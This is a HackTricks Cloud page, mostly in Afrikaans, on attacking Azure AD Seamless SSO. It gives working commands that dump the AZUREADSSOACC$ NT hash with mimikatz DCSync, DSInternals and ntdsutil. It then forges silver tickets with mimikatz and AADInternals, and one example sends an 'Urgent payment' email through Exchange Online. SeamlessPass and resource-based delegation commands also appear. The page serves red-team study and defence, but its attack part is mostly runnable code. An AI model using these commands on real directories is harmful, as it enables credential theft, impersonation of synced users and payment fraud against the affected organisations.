Az - Seamless SSO

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

From the docs: Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) outomaties teken gebruikers in wanneer hulle op hul korporatiewe toestelle gekoppel aan jou korporatiewe netwerk is. Wanneer geaktiveer, hoef gebruikers nie hul wagwoorde in te tik om in te teken op Azure AD nie, en gewoonlik, selfs nie hul gebruikersname nie. Hierdie funksie bied jou gebruikers maklike toegang tot jou wolk-gebaseerde toepassings sonder om enige addisionele on-premises komponente te benodig.

Basies teken Azure AD Seamless SSO gebruikers in wanneer hulle op 'n on-prem domein-verbonden PC is.

Dit word ondersteun deur beide PHS (Password Hash Sync) en PTA (Pass-through Authentication).

Desktop SSO gebruik Kerberos vir verifikasie. Wanneer geconfigureer, skep Azure AD Connect 'n rekenaarrekening genaamd AZUREADSSOACC$ in on-prem AD. Die wagwoord van die AZUREADSSOACC$ rekening word as plain-text na Azure AD gestuur tydens die konfigurasie.

Die Kerberos kaartjies word geënkripteer met die NTHash (MD4) van die wagwoord en Azure AD gebruik die gestuurde wagwoord om die kaartjies te ontsleutel.

Azure AD stel 'n eindpunt (https://autologon.microsoftazuread-sso.com) beskikbaar wat Kerberos kaartjies aanvaar. Die blaaier van die domein-verbonden masjien stuur die kaartjies na hierdie eindpunt vir SSO.

On-prem -> cloud

Die wagwoord van die gebruiker AZUREADSSOACC$ verander nooit. Daarom kan 'n domein admin die hash van hierdie rekening kompromenteer, en dit dan gebruik om silwer kaartjies te skep om met enige on-prem gebruiker gesinkroniseer aan Azure te verbind:

# Dump hash using mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"'
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit

# Dump hash using https://github.com/MichaelGrafnetter/DSInternals
Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso -Server lon-dc1.contoso.local

# Dump using ntdsutil and DSInternals
## Dump NTDS.dit
ntdsutil "ac i ntds" "ifm” "create full C:\temp" q q
## Extract password
Install-Module DSInternals
Import-Module DSInternals
$key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM'
(Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hexos

Met die hash kan jy nou silwer kaartjies genereer:

# Get users and SIDs
Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier

# Create a silver ticket to connect to Azure with mimikatz
Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin /sid:S-1-5-21-123456789-1234567890-123456789 /id:1105 /domain:domain.local /rc4:<azureadssoacc hash> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'
mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:12349e088b2c13d93833d0ce947676dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit

# Create silver ticket with AADInternal to access Exchange Online
$kerberos=New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-3279074086-2022502410-1104" -Hash "097AB3CBED7B9DD6FE6C992024BC38F4"
$at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com
## Send email
Send-AADIntOutlookMessage -AccessToken $at -Recipient "someone@company.com" -Subject "Urgent payment" -Message "<h1>Urgent!</h1><br>The following bill should be paid asap."

Om die silwer kaartjie te gebruik, moet die volgende stappe uitgevoer word:

Begin die Blaaier: Mozilla Firefox moet gelaai word.
Konfigureer die Blaaier:

Navigeer na about:config.
Stel die voorkeur vir network.negotiate-auth.trusted-uris na die gespesifiseerde waardes:
https://aadg.windows.net.nsatc.net
https://autologon.microsoftazuread-sso.com

Toegang tot die Webtoepassing:

Besoek 'n webtoepassing wat geïntegreer is met die organisasie se AAD-domein. 'n Algemene voorbeeld is Office 365.

Verifikasieproses:

By die aanmeldskerm moet die gebruikersnaam ingevoer word, terwyl die wagwoordveld leeg gelaat word.
Om voort te gaan, druk óf TAB óf ENTER.

Dit omseil nie MFA as dit geaktiveer is nie

Opsie 2 sonder dcsync - SeamlessPass

Dit is ook moontlik om hierdie aanval sonder 'n dcsync-aanval uit te voer om meer stil te wees, soos in hierdie blogpos verduidelik. Hiervoor het jy net een van die volgende nodig:

'n Gecompromitteerde gebruiker se TGT: Selfs al het jy nie een nie, maar die gebruiker was gecompromitteer, kan jy een kry deur die vals TGT-delegasie truuk wat in baie gereedskap soos Kekeo en Rubeus geïmplementeer is.
Goue Kaartjie: As jy die KRBTGT-sleutel het, kan jy die TGT wat jy vir die aangevalde gebruiker nodig het, skep.
'n Gecompromitteerde gebruiker se NTLM-hash of AES-sleutel: SeamlessPass sal met die domeinbeheerder kommunikeer met hierdie inligting om die TGT te genereer.
AZUREADSSOACC$ rekening NTLM-hash of AES-sleutel: Met hierdie inligting en die gebruiker se Veiligheidsidentifiseerder (SID) om aan te val, is dit moontlik om 'n dienskaartjie te skep en met die wolk te verifieer (soos in die vorige metode uitgevoer).

Laastens, met die TGT is dit moontlik om die gereedskap SeamlessPass te gebruik met:

seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt <base64_TGT>

Verder inligting om Firefox te stel om met naatlose SSO te werk, kan in hierdie blogpos gevind word.

Skep Kerberos-tickets vir slegs-cloud gebruikers

As die Active Directory-administrateurs toegang tot Azure AD Connect het, kan hulle SID vir enige cloud-gebruiker stel. Op hierdie manier kan Kerberos tickets ook vir slegs-cloud gebruikers geskep word. Die enigste vereiste is dat die SID 'n behoorlike SID is.

Die verandering van SID van slegs-cloud admin gebruikers is nou geblokkeer deur Microsoft. Vir inligting, kyk https://aadinternals.com/post/on-prem_admin/

On-prem -> Cloud via Hulpbron-gebaseerde Beperkte Afvaardiging

Enigeen wat rekenaarrekeninge (AZUREADSSOACC$) in die houer of OU waarin hierdie rekening is, kan 'n hulpbron-gebaseerde beperkte afvaardiging oor die rekening konfigureer en dit toegang gee.

python rbdel.py -u <workgroup>\\<user> -p <pass> <ip> azureadssosvc$

Verwysings

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

PreviousAz - PTA - Pass-through Authentication NextAz - Arc vulnerable GPO Deploy Script

Last updated 3 days ago